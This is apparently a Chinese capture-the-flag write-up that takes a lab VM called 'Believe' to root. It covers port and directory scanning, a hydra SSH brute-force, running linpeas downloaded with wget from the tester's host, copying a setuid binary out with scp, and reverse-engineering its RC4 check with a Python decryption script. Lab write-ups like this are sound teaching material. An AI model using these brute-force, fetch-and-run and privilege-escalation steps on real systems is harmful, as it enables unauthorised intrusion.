Believe

靶机:Believe
作者:Gropers
靶机ID:661
系统:Linux
难度:baby

信息搜集

192.168.43.185

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
┌──(root㉿Eecho)-[~]
└─# rustscan -a 192.168.43.185 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.43.185:22
Open 192.168.43.185:80
Open 192.168.43.185:2222
Open 192.168.43.185:54321
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.185
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-22 23:30 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:30
Completed NSE at 23:30, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:30
Completed NSE at 23:30, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:30
Completed NSE at 23:30, 0.00s elapsed
Initiating ARP Ping Scan at 23:30
Scanning 192.168.43.185 [1 port]
Completed ARP Ping Scan at 23:30, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:30
Completed Parallel DNS resolution of 1 host. at 23:30, 1.50s elapsed
DNS resolution of 1 IPs took 1.50s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 2, CN: 0]
Initiating SYN Stealth Scan at 23:30
Scanning 192.168.43.185 [4 ports]
Discovered open port 54321/tcp on 192.168.43.185
Discovered open port 22/tcp on 192.168.43.185
Discovered open port 2222/tcp on 192.168.43.185
Discovered open port 80/tcp on 192.168.43.185
Completed SYN Stealth Scan at 23:30, 0.02s elapsed (4 total ports)
Initiating Service scan at 23:30
Scanning 4 services on 192.168.43.185
Completed Service scan at 23:30, 6.03s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.185
Retrying OS detection (try #2) against 192.168.43.185
NSE: Script scanning 192.168.43.185.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:30
Completed NSE at 23:30, 0.31s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:30
Completed NSE at 23:30, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:30
Completed NSE at 23:30, 0.00s elapsed
Nmap scan report for 192.168.43.185
Host is up, received arp-response (0.00075s latency).
Scanned at 2026-05-22 23:30:25 CST for 10s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 10.3 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.67 ((Unix))
|_http-title: Login
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.67 (Unix)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
2222/tcp open ssh syn-ack ttl 64 OpenSSH 10.3 (protocol 2.0)
54321/tcp open ssh syn-ack ttl 64 OpenSSH 10.3 (protocol 2.0)
MAC Address: 08:00:27:89:88:60 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), OpenWrt 22.03 (Linux 5.10) (94%), Android 9 - 11 (Linux 4.9 - 4.14) (93%), Linux 2.6.32 (93%), Linux 5.10 - 5.19 (93%), Linux 3.2 - 4.14 (93%), Linux 5.4 - 5.10 (93%), OpenWrt 21.02 (Linux 5.4) (93%), Linux 2.6.32 - 3.10 (93%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.99%E=4%D=5/22%OT=22%CT=%CU=36030%PV=Y%DS=1%DC=D%G=N%M=080027%TM=6A10769B%P=x86_64-pc-linux-gnu)
SEQ(SP=102%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=21)
SEQ(SP=FD%GCD=4%ISR=108%TI=Z%CI=Z%II=I%TS=21)
OPS(O1=M5B4ST11NW9%O2=M5B4ST11NW9%O3=M5B4NNT11NW9%O4=M5B4ST11NW9%O5=M5B4ST11NW9%O6=M5B4ST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW9%CC=Y%Q=)
T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.000 days (since Fri May 22 23:30:32 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT ADDRESS
1 0.75 ms 192.168.43.185

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:30
Completed NSE at 23:30, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:30
Completed NSE at 23:30, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:30
Completed NSE at 23:30, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.60 seconds
Raw packets sent: 49 (3.760KB) | Rcvd: 33 (2.704KB)
  • 22 SSH
  • 80 HTTP
  • 2222 SSH
  • 54321 SSH

一共三个ssh端口????

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(root㉿Eecho)-[~]
└─# gobuster dir -u http://192.168.43.185/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,back,cgi,jpg,json,md -b 403,404
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.43.185/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.8.2
[+] Extensions: md,php,txt,html,back,cgi,jpg,json
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.php (Status: 200) [Size: 772]
dashboard.php (Status: 302) [Size: 0] [--> index.php]
yu.txt (Status: 200) [Size: 27]
Progress: 1985022 / 1985022 (100.00%)
===============================================================
Finished
===============================================================

yu.txt提示了

ssh just port 22 ? [emoji]

尝试登录ssh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(root㉿Eecho)-[~]
└─# ssh eecho@192.168.43.185
The authenticity of host '192.168.43.185 (192.168.43.185)' can't be established.
ED25519 key fingerprint is: SHA256:xJ90oWmr5sPR2afHz9etzSdtxINmLI+JvbwgV/iCsWY
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:8: [hashed name]
~/.ssh/known_hosts:15: [hashed name]
~/.ssh/known_hosts:24: [hashed name]
~/.ssh/known_hosts:25: [hashed name]
~/.ssh/known_hosts:27: [hashed name]
~/.ssh/known_hosts:34: [hashed name]
~/.ssh/known_hosts:40: [hashed name]
~/.ssh/known_hosts:70: [hashed name]
(2 additional names omitted)
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.43.185' (ED25519) to the list of known hosts.
==================================================
admin
yubao9694482664
==================================================
eecho@192.168.43.185's password:

┌──(root㉿Eecho)-[~]
└─# ssh eecho@192.168.43.185 -p 2222
eecho@192.168.43.185's password:

┌──(root㉿Eecho)-[~]
└─# ssh eecho@192.168.43.185 -p 54321
eecho@192.168.43.185's password:

banner里给了一个用户名和密码但是web登录页面没登录进去。尝试ssh也没登录进去

仔细观察可以发现web目录扫出一个yu.txt,banner给了密码里面包含yubao。所以用户可能是以下

yu

yubao

bao

爆破ssh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# vim users.txt
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# cat users.txt
yu
yubao
bao
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# hydra -L users.txt -p yubao9694482664 ssh://192.168.43.185:2222
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-26 17:45:00
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:3/p:1), ~1 try per task
[DATA] attacking ssh://192.168.43.185:2222/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-05-26 17:45:00
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# hydra -L users.txt -p yubao9694482664 ssh://192.168.43.185:22
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-26 17:45:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:3/p:1), ~1 try per task
[DATA] attacking ssh://192.168.43.185:22/
[ERROR] could not connect to ssh://192.168.43.185:22 - Socket error: Connection reset by peer
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# hydra -L users.txt -p yubao9694482664 ssh://192.168.43.185:54321
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-26 17:44:35
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:3/p:1), ~1 try per task
[DATA] attacking ssh://192.168.43.185:54321/
[54321][ssh] host: 192.168.43.185 login: yu password: yubao9694482664
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-05-26 17:44:35

54321端口的ssh成功爆破出了用户为yu

ssh登录

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# ssh yu@192.168.43.185 -p 54321
yu@192.168.43.185's password:
_
__ _____| | ___ ___ _ __ ___ ___
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
\ V V / __/ | (_| (_) | | | | | | __/
\_/\_/ \___|_|\___\___/|_| |_| |_|\___|

yu@Believe:~$ id
uid=1000(yu) gid=1000(yu) groups=1000(yu)
yu@Believe:~$

提权

yu -> root

1
2
3
4
5
6
7
8
9
yu@Believe:~$ sudo -l
Matching Defaults entries for yu on Believe:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for yu:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User yu may run the following commands on Believe:
(root) NOPASSWD: /root/be

可以使用be提权

image

需要输入密钥

同时yu用户目录下也有个be文件但是没有任何权限

1
2
3
4
5
6
7
yu@Believe:~$ ls -al
total 896
drwx------ 2 yu yu 4096 May 14 15:16 .
drwxr-xr-x 3 root root 4096 May 12 22:10 ..
---------- 1 root root 900520 May 14 11:45 be
-rw-r--r-- 1 yu yu 91 May 14 14:58 hint.txt
-rw-r--r-- 1 yu yu 22 May 14 01:13 user.txt

上传linpeas扫描

1
2
3
wget http://192.168.43.6/linpeas.sh.1
chmod +x linpeas.sh.1
./linpeas.sh.1

有个/var/log/.hidden下有个隐藏文件

image

一直在循环,7个一循环组合起来就是believe

image

尝试输入到be

1
2
3
4
5
6
7
8
9
10
11
12
13
yu@Believe:/var/log/.hidden$ sudo -l
Matching Defaults entries for yu on Believe:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for yu:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User yu may run the following commands on Believe:
(root) NOPASSWD: /root/be
yu@Believe:/var/log/.hidden$ sudo /root/be
验证密钥(*******): believe
密钥正确
yu@Believe:/var/log/.hidden$

成功后发现当前用户的家目录下be文件已经有权限了且包含s位,那么可以利用/home/yu/be进行提权了

image

get下来使用ida分析

1
2
3
4
5
6
7
8
yu@Believe:~$ scp be root@192.168.43.6:/tmp/bbbb
The authenticity of host '192.168.43.6 (192.168.43.6)' can't be established.
ED25519 key fingerprint is: SHA256:ZyUbPteDlhKgfFR102PGhJUWNS++vR62HchhPFY2Cfw
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.43.6' (ED25519) to the list of known hosts.
root@192.168.43.6's password:
be

main函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
int __fastcall main(int argc, const char **argv, const char **envp)
{
int v3; // edx
int v4; // ecx
int v5; // r8d
int v6; // r9d
int v7; // ecx
int v8; // r8d
int v9; // r9d
char v11[256]; // [rsp+0h] [rbp-230h] BYREF
char v12[256]; // [rsp+100h] [rbp-130h] BYREF
_QWORD v13[2]; // [rsp+200h] [rbp-30h]
int v14; // [rsp+210h] [rbp-20h]
char v15[8]; // [rsp+21Ch] [rbp-14h] BYREF
int v16; // [rsp+224h] [rbp-Ch]
int v17; // [rsp+228h] [rbp-8h]
int i; // [rsp+22Ch] [rbp-4h]

v13[0] = 0xAB9D4B7850275324LL; /*0x401b39*/
v13[1] = 0x7EEAF249A1F07EABLL; /*0x401b3d*/
v14 = 2005036268; /*0x401b41*/
generate_key((__int64)v15); /*0x401b4f*/
printf((unsigned int)&unk_496061, (_DWORD)argv, v3, v4, v5, v6, v11[0]); /*0x401b63*/
if ( (unsigned int)_isoc23_scanf((unsigned int)"%255s", (unsigned int)v12, (unsigned int)"%255s", v7, v8, v9, v11[0]) != 1 ) /*0x401b89*/
return 1; /*0x401b8b*/
v16 = j_strlen_ifunc(v12); /*0x401ba4*/
rc4_init((__int64)v11, (__int64)v15, 7); /*0x401bbd*/
rc4_crypt((__int64)v11, (__int64)v12, v16); /*0x401bd9*/
if ( v16 != 20 ) /*0x401be2*/
goto LABEL_11; /*0x401be2*/
v17 = 1; /*0x401be4*/
for ( i = 0; i <= 19; ++i ) /*0x401beb*/
{
if ( v12[i] != *((_BYTE *)v13 + i) ) /*0x401c0d*/
{
v17 = 0; /*0x401c0f*/
break; /*0x401c16*/
}
}
if ( v17 ) /*0x401c26*/
{
puts(&unk_49607F); /*0x401c32*/
get_shell(); /*0x401c37*/
}
else
{
LABEL_11:
puts(&unk_49608F); /*0x401c59*/
}
return 0; /*0x401c63*/
}

主函数逻辑

  1. 定义目标密文 v13[0]、v13[1]、v14(共 20 字节)
  2. 调用 generate_key() 生成 RC4 密钥
  3. 使用 scanf() 读取用户输入
  4. 调用 rc4_init() 初始化 RC4 状态
  5. 调用 rc4_crypt() 加密用户输入
  6. 比较加密结果与目标密文(逐字节比对)
  7. 验证成功则调用 get_shell()

密钥生成函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
__int64 __fastcall generate_key(__int64 a1)
{
char v2[7]; // [rsp+Dh] [rbp-Bh] BYREF
int v3; // [rsp+14h] [rbp-4h]

strcpy(v2, "认符星"); /*0x401a2c*/
BYTE1(v3) = 0; /*0x401a3a*/
HIWORD(v3) = 0; /*0x401a3a*/
while ( v3 <= 6 ) /*0x401a67*/
{
*(_BYTE *)(v3 + a1) = v2[v3] ^ 0xAA; /*0x401a5d*/
++v3; /*0x401a5f*/
}
*(_BYTE *)(a1 + 7) = 0; /*0x401b71*/
return a1 + 7; /*0x401b75*/
}

密钥推导过程

字符串 “认符星” 的 UTF-8 编码转换为十六进制:

1
2
3
"认" = 0xE8 0xAE 0xA4
"符" = 0xE5 0xAD 0x9F
"星" = 0xE8

每个字节与 0xAA 进行异或运算:

1
2
3
4
5
6
7
0xE8 ^ 0xAA = 0x42 → 'b'
0xAE ^ 0xAA = 0x04 → 'e'
0xA4 ^ 0xAA = 0x0E → 'l'
0xE5 ^ 0xAA = 0x4F → 'i'
0xAD ^ 0xAA = 0x07 → 'e'
0x9F ^ 0xAA = 0x35 → 'v'
0xE8 ^ 0xAA = 0x46 → 'e'

最终密钥 : “believe”

RC4 初始化函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
unsigned __int64 __fastcall rc4_init(__int64 a1, __int64 a2, int a3)
{
unsigned __int64 result; // rax
unsigned __int8 v4; // [rsp+1Bh] [rbp-9h]
int v5; // [rsp+1Ch] [rbp-8h]
int i; // [rsp+20h] [rbp-4h]
int j; // [rsp+20h] [rbp-4h]

v5 = 0; /*0x40181b*/
for ( i = 0; i <= 255; ++i ) /*0x401822*/
{
result = i + a1; /*0x401835*/
*(_BYTE *)result = i; /*0x40183b*/
}
for ( j = 0; j <= 255; ++j ) /*0x40184a*/
{
v5 = (*(unsigned __int8 *)(j + a1) + v5 + *(unsigned __int8 *)(j % a3 + a2)) % 256; /*0x40189a*/
v4 = *(_BYTE *)(j + a1); /*0x4018ad*/
*(_BYTE *)(j + a1) = *(_BYTE *)(v5 + a1); /*0x4018cd*/
result = v4; /*0x4018dc*/
*(_BYTE *)(a1 + v5) = v4; /*0x4018e0*/
}
return result; /*0x4018f5*/
}

参数说明 :

  • a1 : RC4 状态数组指针(S-box)
  • a2 : 密钥指针
  • a3 : 密钥长度(7)
    初始化过程 :
  1. 第一层循环:用 0-255 初始化 S-box
  2. 第二层循环:基于密钥打乱 S-box

RC4 加密函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
__int64 __fastcall rc4_crypt(__int64 a1, __int64 a2, int a3)
{
__int64 result; // rax
char v4; // [rsp+23h] [rbp-11h]
unsigned int i; // [rsp+28h] [rbp-Ch]
int v6; // [rsp+2Ch] [rbp-8h]
int v7; // [rsp+30h] [rbp-4h]

v7 = 0; /*0x401906*/
v6 = 0; /*0x40190d*/
for ( i = 0; ; ++i ) /*0x401922*/
{
result = i; /*0x401a14*/
if ( (int)i >= a3 ) /*0x401a1a*/
break; /*0x401a1a*/
v7 = (v7 + 1) % 256; /*0x401943*/
v6 = (v6 + *(unsigned __int8 *)(v7 + a1)) % 256; /*0x40196d*/
v4 = *(_BYTE *)(v7 + a1); /*0x401980*/
*(_BYTE *)(v7 + a1) = *(_BYTE *)(v6 + a1); /*0x4019a0*/
*(_BYTE *)(a1 + v6) = v4; /*0x4019b3*/
*(_BYTE *)((int)i + a2) ^= *(_BYTE *)((unsigned __int8)(*(_BYTE *)(v7 + a1) + *(_BYTE *)(v6 + a1)) + a1); /*0x401a0e*/
}
return result; /*0x401a22*/
}

加密过程 :

  1. 初始化计数器 i = 0, j = 0

  2. 对每个字节:

    • i = (i + 1) % 256
    • j = (j + S[i]) % 256
    • 交换 S[i] 和 S[j]
    • 密钥流字节 K = S[S[i] + S[j]]
    • 明文字节与 K 异或得到密文

Shell 获取函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
unsigned __int64 get_shell()
{
const char *v1[4]; // [rsp+0h] [rbp-40h] BYREF
char v2[18]; // [rsp+20h] [rbp-20h] BYREF
unsigned __int64 v3; // [rsp+32h] [rbp-Eh]
__int16 v4; // [rsp+3Ah] [rbp-6h]
int i; // [rsp+3Ch] [rbp-4h]

v3 = 0x8C9E9DD091969DD0LL; /*0x401a89*/
v4 = -105; /*0x401a8d*/
for ( i = 0; i <= 9; ++i ) /*0x401a93*/
v2[i] = ~*((_BYTE *)&v3 + i); /*0x401aaf*/
v2[10] = 0; /*0x401abd*/
setuid(0); /*0x401ac6*/
setgid(0); /*0x401ad0*/
v1[0] = v2; /*0x401ad9*/
v1[1] = (const char *)&unk_496030; /*0x401ae4*/
v1[2] = 0; /*0x401ae8*/
puts(&unk_496038); /*0x401afa*/
return execve(v2, v1, 0); /*0x401b18*/
}

Shell 解密过程 :

  • 原始值: 0x8C9E9DD091969DD0
  • 按字节取反: ~0x8C = 0x73 = ‘s’ , ~0x9E = 0x61 = ‘h’ , …
    最终结果 : “/bin/sh”

密文提取

从 IDA Pro 中提取目标密文时需要注意 小端序 转换:

IDA 显示值 实际内存字节顺序 说明
0xAB9D4B7850275324 24 53 27 50 78 4B 9D AB v13[0] 低 8 字节
0x7EEAF249A1F07EAB AB 7E F0 A1 49 F2 EA 7E v13[1]
2005036268 (0x77726573) EC 6C 82 77 v14
1
2
3
4
5
target = bytes([
0x24, 0x53, 0x27, 0x50, 0x78, 0x4b, 0x9d, 0xab,
0xab, 0x7e, 0xf0, 0xa1, 0x49, 0xf2, 0xea, 0x7e,
0xec, 0x6c, 0x82, 0x77
])

解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
def rc4_init(key):
"""
RC4 初始化函数
参数:
key: 密钥字节串
返回:
S: 初始化后的 S-box
"""
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = S[j], S[i]
return S

def rc4_crypt(S, data):
"""
RC4 加密/解密函数
参数:
S: rc4_init 返回的 S-box
data: 要加密/解密的数据字节串
返回:
加密/解密后的结果字节串
"""
i = 0
j = 0
result = []
for byte in data:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
t = (S[i] + S[j]) % 256
result.append(byte ^ S[t])
return bytes(result)

def main():
# RC4 密钥
rc4_key = b"believe"

# 目标密文(小端序存储)
target = bytes([
0x24, 0x53, 0x27, 0x50, 0x78, 0x4b, 0x9d, 0xab,
0xab, 0x7e, 0xf0, 0xa1, 0x49, 0xf2, 0xea, 0x7e,
0xec, 0x6c, 0x82, 0x77
])

# 初始化 RC4
S = rc4_init(rc4_key)

# 解密得到密码
password = rc4_crypt(S, target)
print(f"密码: {password}")

if __name__ == "__main__":
main()

image

执行be进行提权

1
2
3
4
5
6
7
yu@Believe:~$ /home/yu/be
请输入系统密钥: Believe_in_yourself!
验证成功。
[+] 正在请求 Believe 核心权限...
Believe:/home/yu# id
uid=0(root) gid=0(root) groups=1000(yu)
Believe:/home/yu#

image

复盘

问题一

查看/var/www/html/index.php可以发现代码中写出了必须连续成功提交三次正确的凭据,才能登录,这就解释了为什么前面登录不上的原因

image

问题二

前面一共三个ssh端口但只有54321才能登录

查看/etc/ssh/sshd_config可以知道

image

22端口和2222端口被禁止yu登录了

问题三

/var/log/.hidden/.ghost_radio一直在不停的循环believe

在/root目录下的radio.sh给出了解释

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/bin/bash

CHANNEL="/var/log/.hidden/.ghost_radio"
MESSAGE="believe"
NOISE="grep"

[ -p "$CHANNEL" ] || mkfifo "$CHANNEL"
chown yu:yu "$CHANNEL"
chmod 400 "$CHANNEL"

exec 3<> "$CHANNEL"

while true; do
i=1
while [ $i -le ${#MESSAGE} ]; do
char=$(echo "$MESSAGE" | cut -c $i)
echo "i>$char" >&3 2>/dev/null
sleep 3
echo "i>$NOISE" >&3 2>/dev/null
sleep 3
i=$((i + 1))
done
done

这是一个伪装成系统日志通道的发送器。它通过不断发送 i>b​、i>grep​、i>e​、i>grep… 这种循环序列